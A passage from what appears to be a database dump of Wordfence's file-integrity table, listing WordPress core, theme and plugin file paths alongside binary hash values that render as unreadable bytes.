P�f�R2���.��z','��/��\n���0ۥK���.�Į�\r&$B�\Z}','',0,'?'),('�����Ƅ���NB','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@8���s��A��','b�#�x��h�F4�_ �De���qeD��','',0,'?'),('���?ڟ�E���$PF','wp-includes/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('���u�ۜ�*���','wp-content/plugins/disable-gutenberg/inc/settings-reset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+ButO��I�����',')��-<\rYB &z��T�ag@�>�)�X��x�','',0,'?'),('���6��b�g�>_�','wp-includes/images/wlw/wp-watermark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),('�h�x�*(�&���kO�','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��yGF�,{��X�z','%Ԝ5��;�����x��^)���G(��o','',0,'?'),('�����\'K�z�f��','wp-includes/customize/class-wp-customize-header-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('��5#�\"8�%`}','wp-content/wflogs/template.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�\r�f����h�8�!','wp-includes/Requests/Exception/HTTP/500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����km�\n H�M��','FO���V3\"���������!k�P�','',0,'?'),('���v9�b�$�L','wp-includes/random_compat/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('�!Y;��I-���u','wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�rV��S�|�k���',' ��^��67�+�k�`�ۍ���]B���G��p','',0,'?'),('�#�?���Gc ¯l1e','wp-includes/class-wp-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ɱ��h�k2\\���','��8B�^���K��ڝo�d#T��s\0����C','',0,'?'),('�+Z�黶:�qO9]�W','wp-content/themes/weblog/acmethemes/customizer/header-options/menu-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����V�)�\rE@�','Bv? �O/&0���b$�U��r����%�4\"','',0,'?'),('�H�����Pw��%8��','wp-includes/images/smilies/icon_sad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('�K�{�*�)�����','wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�@�c��<�W8DM','��wL�\rd�Ê��3��<\'\n�:&̉��$3$O','',0,'?'),('�Q49��Lz�J�','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','()p��|˜���s���T','���R��j�-y}��EHh\r�F�D�����BA�','',0,'?'),('�V��{v#���V�mE','wp-content/themes/advance/inc/kirki/assets/js/controls/checkbox.js',0,'ă���O*��B�&X�T','ă���O*��B�&X�T','_��\'`���tQ?_��`N�\0C���p�X��','',0,'?'),('�XX*��!2�~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eb:lx-�<��s99`','�,��{ m��Z��BV�TL�;*���<','',0,'?'),('�Y�f�����S+�','wp-content/themes/healthcare/css/font-awesome/css/font-awesome.min.css - Shortcut.lnk',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��\Z��e^��U�$-��','�9���mhl�yD���H��plh�`#A�d','',0,'?'),('�[�n�G{�\'��q:�','wp-includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K��Mý','��{�\"�z�GW1ɓDĝ��U�͏�[���','',0,'?'),('�\\�h� R�X�<�C�','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���߅�w@L��O�R','��EF�j���r�č;s��.f:��Ϥ�F','',0,'?'),('�|W��<�|ƀJ��','wp-content/plugins/wp-cerber/assets/flags/cw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��J�ח�_yzx�6O','wp-admin/network/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�H\r��5:�6�','*]X8���%�KқR ���Q�f�;\ne�\r�6\\','',0,'?'),('���Ȁ�~_q�I��S�','wp-admin/js/password-strength-meter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��3�r�;]�<|�','����1��y吥!�}}�3ɻ}}�te\nt�','',0,'?'),('���\\�D �>�F,���','wp-admin/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�����\r�]@��','�M�!҃�hMg?LO�\0ş�@���M�\"M�.','',0,'?'),('��;37zՊ[7>�\n\r�','wp-content/themes/healthcare/css/font-awesome/less/variables.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?n�8�����n�','��� <mA;�u������F��C���?�\n','',0,'?'),('�� �\")�\"��0I�o��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��q\Zs��q776�','C�D�a�$�=�f[Q�4�JW�7l)�.�=%��','',0,'?'),('������W��e���','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/data/gfonts.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4Y�*HM�;\Z!��','��+�4a�<`�-����ak�!��A2\Z�y\"\rM','',0,'?'),('�������&Ż�(','wp-admin/js/widgets/custom-html-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��˧0�o�r�j�{�','<������\"W63�`�/p�0h���LH�MG1','',0,'?'),('��~+�q�X��\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oaQ���|g�4&��','�c�U�X����+�]Wvd�=�,����Z0)\\�','',0,'?'),('�[p}�C� ��M\\Q/','wp-content/themes/skt-toothy/images/icon-medical.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dRF~\0����$N���','V.�z����&��ظ*�E�H�\r�2�����85}','',0,'?'),('�\\�`7O+�8�t�C��','wp-content/plugins/redirection/locale/json/redirection-zh_TW.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�BU\0�A��g��5','��p�)�?�c߸o���&QmDo�jS�+�m','',0,'?'),('��}Hy�M��1�ě8','wp-admin/images/about-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nڢ�U�����M�','��@^��Iͮ�s������L�:}|9�ƶ�KXk','',0,'?'),('��=CѠ��*TX�4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ր�]P�̍f��Vk�k�','�3}�c9j�my�����@s��p�VR�9Z','',0,'?'),('���hv}!�ɓ@ӹ�m�','wp-content/themes/doctors/core/includes/trunk/fe2/fe2_mods.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/���2�t Z�>d>U�','m%C���^ϗh,��&�qk�����a�k�R','',0,'?'),('��ڷt�g�Z�gE�','wp-includes/class-wp-http-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��y�K���ߕ','�Ι ��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('�� ��It13&','wp-admin/js/nav-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F0�ݶN��j�!�','����mn��hAɉg8��gj���m[)�B��','',0,'?'),('�_�nv�OfS���S!','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select2.php',0,'�[�>i�1L1��q�E4*','�[�>i�1L1��q�E4*','u\0yUM���ɪ���vU�Y`�I�A5xa�vN@','',0,'?'),('���G�l���ݠ_�','wp-includes/js/dist/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W!j`(�YՌ�f�','��2�&�;��F�7�A\nOM�X�����','',0,'?'),('�J-狁��\\\"�ץ&�','wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w.�n��7��I���','����W��.�3$��^�O�:7za��0A�','',0,'?'),('�;?2��S��\0��p','wp-admin/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w ���y����C>�','��vV��� v�b��\Z�[Zu�G� GnA�\"�H77','',0,'?'),('�<J��K9���\Z�','wp-content/themes/doctors/core/contents/loop_search/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b4\no�G�_�ι��\0','<�r�2�Kv�4M�j�Gf�R@s�F�d/~�','',0,'?'),('�Vō�K%���?9c��','wp-content/themes/regina-lite/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�$��;�����ÿD','x6�@�\n�qv�dR>��{�8^�_��pQ','',0,'?'),('�W�-�ى��|�Ǘ��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��b�)EoB�$�w�M','�x�c�$I-=�VMjSd�b�6A;{��','',0,'?'),('�X��@��%�1C��i','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�[�?��n2��\"d�d','wp-content/plugins/wp-cerber/assets/bn4ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��L���uLT�','�TZ�G���~S-�{&M:�\r��/7O���T�','',0,'?'),('�\\j����*d�� I�','wp-content/themes/doctors/images/demo/slider_1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vs`�a��.���','��0UP�s�-�-�7�;���LZ[ڏ�F��','',0,'?'),('�]�.�1\rPXL�','wp-admin/includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^ �4j��/�?\\��','�V��a�U�ˁ�F�V���ߴYn$\ZӸ#�\'R�K�','',0,'?'),('�f(�9��6��yaN|2','wp-content/plugins/wordfence/waf/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z^:@��JKL����S','�\rH����n`�>�--\\Tr���7,��','',0,'?'),('�l_S� 9�����[','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��4��)�R�>��i','�4xZP���]�QT[6�Z;����n���P�','',0,'?'),('�rY��\0�S���(z|�','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Gb�yf��|��S���','�o��G5}[�`�n��x���ܡ^�@B#���lb','',0,'?'),('�s8��\'��ɀ�\Z%Cx','wp-includes/blocks/archives/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�P*�5�\\�d\"Sn�','�/qkU����5i�#��-�̄aye�d̹�B:','',0,'?'),('�u$�{���ܨ��v�','wp-includes/blocks/latest-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��c\r9+@/K<�2','=�\n+rS�D;��|�Y}�VĒP[�o =]LJ','',0,'?'),('�~K�Ɂ�wwf�C�','wp-admin/js/widgets/media-gallery-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�c/����I���<�','�y�\\�R�T�ܠ�U�tmY�(��㻱̿','',0,'?'),('��}z��#����\Z','wp-includes/Requests/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','52]��{�}�� `X','�I?~�4���]4�����K��F��\"v�I(','',0,'?'),('���ƌ\Z��,�H��','wp-content/themes/twentynineteen/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xZ�SY�S�m\" ��a','�UYX�}�m�\",W�9:۸�.�෦Ho�\"�','',0,'?'),('��K���K�1�l�!�D','wp-content/themes/twentytwenty/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ƅ�&8����','̸����������\n�X���Gz�y�\\Kq�WQ','',0,'?'),('��\0ceU�`�{��g��','wp-content/plugins/wp-cerber/assets/flags/kr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Uґ0Pl�{��ip','Zy���\Z�(�r��Q�N��ӌ���b�[P���','',0,'?'),('��\r���[��\0�EuJ','wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�̦���QK�#','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('��4�y�3%k� ����','wp-admin/js/widgets/media-image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;k�#?��cQ7��(e','�o��{�\rr�h5��F�w�w� L�e�Fz�]�','',0,'?'),('������|� ��','wp-includes/js/masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('���C�`i�?{��5S','wp-content/themes/skt-toothy/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v>�,?�+�)�1�Y�','�5g.U�-��.��v+��F�me��]�U�','',0,'?'),('��Θ��r(��Ł�� ','wp-admin/js/auth-app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���LP���S[��f�','F@H���8�݇��7an���#{�����j�','',0,'?'),('��nHHХR���?','wp-content/plugins/wp-cerber/assets/flags/gh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,La^���#d�e\'','��^�sV��z�3���:4�i�[��K���','',0,'?'),('���v{C����ҧ��4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�����\"J�3Z��w','�m��e�=�H��oD���OT�\0�v���','',0,'?'),('��p�$^���d�Z','wp-admin/network/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%(F��v\0�~��F','ڙs-s���~�uYe������T��F�4�!� *','',0,'?'),('�ګ�c\r2�8.�\'�\"','wp-content/themes/twentytwentyone/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?yO��+��D��','�\n=/��?I�l�b�i��8�A�HxV�5A?vi','',0,'?'),('��G��ۉ��\\}����','wp-content/plugins/wp-cerber/assets/flags/cc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� .-6����C#�','&��i��y�_��_����vV>�~���d','',0,'?'),('��c�R�f3�p5�','wp-content/plugins/redirection/modules/apache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�P5.s�(<א�\\','9*z0����SU��8/R��v��]`>�N�','',0,'?'),('��[K���b���28�','wp-includes/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{K_��eG�@{ /','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('�K��i��O�DR','wp-content/themes/vision-lite/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MS��Qnф̩�����','��O]w��f��R�jLZo<�qe���:L�','',0,'?'),('���`I�oms�S!�','wp-content/plugins/redirection/locale/redirection-en_GB.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��s��yo�i�','��Ŋ�p>g�W�͈���Ȋ�*�~.��6߽','',0,'?'),('���X����J��p','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T����Q�x�j�','�����1Y����T��Ј�q�W6���h ','',0,'?'),('�&½1YxFu����mpC','wp-content/themes/twentytwentyone/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۏ�5����e����~7','r|1��� P.�;FvrF���0^�ػ� �R^��','',0,'?'),('�+�\ZDM�Q�#B��','wp-content/themes/healing-touch/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wh%��k���U\"�t{�','##6|���p�v|��;L�m��~�f\nf27��','',0,'?'),('�S���q�`���M�','wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڡq�1�b��4� G*','{U%�Hv��3�)�|w��-L��&���.䌩','',0,'?'),('�n֢��\r�V5��,�','wp-includes/widgets/class-wp-widget-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ha�+��ޭj�s2���','f��\r`.\\�۬\r�����H�Pg���!M�w�m��','',0,'?'),('�o����l>��x~I� �','wp-admin/network/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���(���4�G�','��j/}Ӆ���\0E�S��̤\\Hg�#Z��._','',0,'?'),('��\\|��?���~M>','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/customizer-navigation/customizer-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����o��^��;;�','έ�C� ��f-G�����eNwbQ\'�c���Y','',0,'?'),('����3}T��Uĥ���w','wp-content/themes/doctors/core/contents/loop_post/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t̑\\�:������j�','�ݧ�/Z#=3Z��6�U��+��|�Ɔ�h','',0,'?'),('��H�� �-�0f����','wp-content/themes/weblog/acmethemes/core/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!`l�����(','���c�C�{g����$�I�M��4]:Đ��','',0,'?'),('���0j�l�S�K�','wp-includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��Ԑ��[\"`}B','�)���v��\"�G��\"�YV<�Q�X :��','',0,'?'),('����ސ�q�ic�=�','wp-includes/class-wp-simplepie-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��88A�`�w+��p�T','�8u]�p�Q_�t�Rۮ]o}e5#�P5b2BU��','',0,'?'),('���\\z\r.����\Z�w~','wp-content/themes/vision-lite/js/jquery.nivo.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P.�M<�����Q#\n�','O-r�rY�O���ga�/�- <��҄i2h�','',0,'?'),('��s�ՌQ��7o���','wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ѿD�\0�|����s�W','�\n*�v�Q��(G��i�u�3@��4��*���','',0,'?'),('�«��-j=�u�N\\q\'','wp-admin/css/farbtastic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8)���}{��C�h2U','|A��L��Mb�x�d8X�jX.���^\n\Z�','',0,'?'),('��ᗏ�3�-��4�','wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�]��4>�*I��w�','��خ`��$�%�T�{����rKN���k6��','',0,'?'),('�\"ڕK[@�G����9�','wp-admin/includes/class-wp-theme-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rz[�HH;nc�.u@�','��>�X�b]|$�Xq���@N�]m�Y�v�t��','',0,'?'),('�#��u0�c���}���','wp-includes/js/dist/i18n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n|7�>&���~�','�W\n��U,���5��m�_7�qv�L-�K��P%','',0,'?'),('�$�Q�sP���R3}/','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��9o;&�t���','C۞�`�)�t����f��K|j�����d�~','',0,'?'),('�+���\rh��e���6�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^=Z�ĩ���@��','�T��R�dT�\r9@\ZIX�X\"lz�Ǯ��\'','',0,'?'),('�3!9�=�6�ݡ','wp-admin/images/resize-rtl-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M���M�H�!�YA','�2��m�o��{�|�ny��˃�4(�φ�=�','',0,'?'),('�Ioo�Ԇ5nu�ѭ��H','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('�Zg�Ui1i�ƾ�x�=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�W�,��XEE�o�','l?���)&&������P��P$@�\\�/�','',0,'?'),('�^2^�T��:�mJ��:�','wp-content/plugins/wordfence/lib/IPTrafList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�;s�ռ�;\0+g�','��T���D�H.1\0�B6�E?{��s��g\"��$�','',0,'?'),('�b�0݀>j�\"��G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�w�md�_�bG2��CM','wp-content/themes/skt-toothy/images/page-image-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=C�z�vVR��','��<�D�CN5��M(U�1�2��>ŋ�uNY��','',0,'?'),('���n�Ioc�!���','wp-content/plugins/wp-cerber/assets/magnific/jquery.magnific-popup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�$Ȼ�����0bn','mS$^�|T�8�đ����=�ظ�l��F��`p�','',0,'?'),('���o<��e����','wp-content/plugins/redirection/locale/redirection-zh_TW.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��bm�8ﰉ$��','5�6�o���\0�g�{��8e�O`aI{�6��/9','',0,'?'),('���c����Vs�9�o��','wp-includes/css/dist/editor/editor-styles-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#YR\nP��>�y�L�,','�4�A�&E(6��~�e�|vH��l�;���R�','',0,'?'),('��q����eE:�/n�','wp-content/themes/regina-lite/layout/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Zj���4��R\Zr�','���wۣm&�?��#]�rA��t�����\Zᛎ','',0,'?'),('��O��4����%m�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��?1� ���4��M�','e��2M�B���\n\0��7�0�Zz�F%�s','',0,'?'),('��sC<�:���<�A�','wp-includes/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:�Z{���5�o','���<�s�6��\0, Ra�uhX��c���','',0,'?'),('�����@�j=�','wp-content/plugins/wp-cerber/assets/sh/scripts/shBrushPhp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nR�1G˕�\n���hc�','����� ��^b��V���l!�,�G�3/','',0,'?'),('�)[\"J�H��|�jk��$','wp-admin/js/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\,yI����D�a','��}�u�}@�\Z�\\,�XK��r�;7f��','',0,'?'),('�?Fϸ����A��R1�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��ԏ�d0��lN&7+','^s\n�@G,�ږ\n;|3P nԔ/\rzA�\"\nd','',0,'?'),('�JTV0D��oTA[@�','wp-admin/options-discussion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��~�vg��3ܘ�','�lAt;��#�Tt�_�y\\S=���#:X٥j�','',0,'?'),('�j�6�M�.\'�KA�','wp-content/themes/healing-touch/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����2<��l��','��!�r[o�a���_ݼZ�?������P[�','',0,'?'),('��\\����\r� ��:#�K','wp-content/plugins/wp-cerber/assets/flags/bo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0-�a�vv��','=�IS}�@l��U�%s�=�FG41R�\'�','',0,'?'),('����S�8M�C��>��','wp-includes/js/dist/block-serialization-default-parser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZZb&\'���C����','���{���E�#G�`T`��4��4ܯ��','',0,'?'),('�����dD����+P�','wp-content/themes/twentytwenty/template-parts/modal-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�xρ� �.��P�','=w��q��:��\'�`�CL,IH��E�Ǖ��\0�g','',0,'?'),('����S�h���S�%Tz�','wp-includes/js/mediaelement/wp-mediaelement.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%/NqOR�g��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('��������3���k�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-dashboard-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-����X>`b','�s��a�Ӌ�\0$T���bc8��dŅ���?>','',0,'?'),('��VϺz#���m)��','wp-content/themes/twentytwenty/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Χn��*�B\"�z���0B','��_\\�]-�V|���ʓO>;��O�$�Pw�2�','',0,'?'),('��.������I�\\�','wp-content/plugins/wp-cerber/assets/flags/jo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z>\Z�➶6�A3+Lh�','��\'\"5��zF��aLK�3pr��*�=�.>aq\"','',0,'?'),('���\"ܒ����nzD','wp-includes/SimplePie/Caption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊��y�u�D\r£�','\'�W1Q�5[ۋ�)��\r�85:��?*)K','',0,'?'),('���Wd�;C\r���O�','wp-content/plugins/akismet/views/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�.-Ҿ�z�<��D��','�Qǣd3ME�D��v/�Z�_a�!�/.�A1���','',0,'?'),('��ˋ�_o!\'�u��r','wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)\Z���tU2Ec0\'�','�úM�..8��ѹ>Nw�j�Z����Wb��*B�','',0,'?'),('��Z\nu�oK� ��T;e','wp-admin/images/list.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��*�ӳ�S��','\\w��T[�=�b�aCk������;c���','',0,'?'),('��ll���x�L,7W�N�','wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���\r$��o��','l�?�9Rw\"H�^�\r�s�������\ZD:�F�a','',0,'?'),('���Uy/�*%��;','wp-admin/includes/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��4�-��͕*s','��qO��j�[��=�\\����rc�8�s�H�','',0,'?'),('�\rE��U���̈́��','wp-includes/images/wpspin-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('�W���P旃^q�y�','wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5X��P���K���','�S���P���A�_�l�W��2��?#_\rQ�x�','',0,'?'),('�I=bh�ʔGIkoba','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N_=r��V�oAՌB�','�u��$�\n\r�K���S��-�w/?_��#K','',0,'?'),('�1�1]PC��g4�FU=','wp-content/plugins/wordfence/js/jquery.colorbox.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\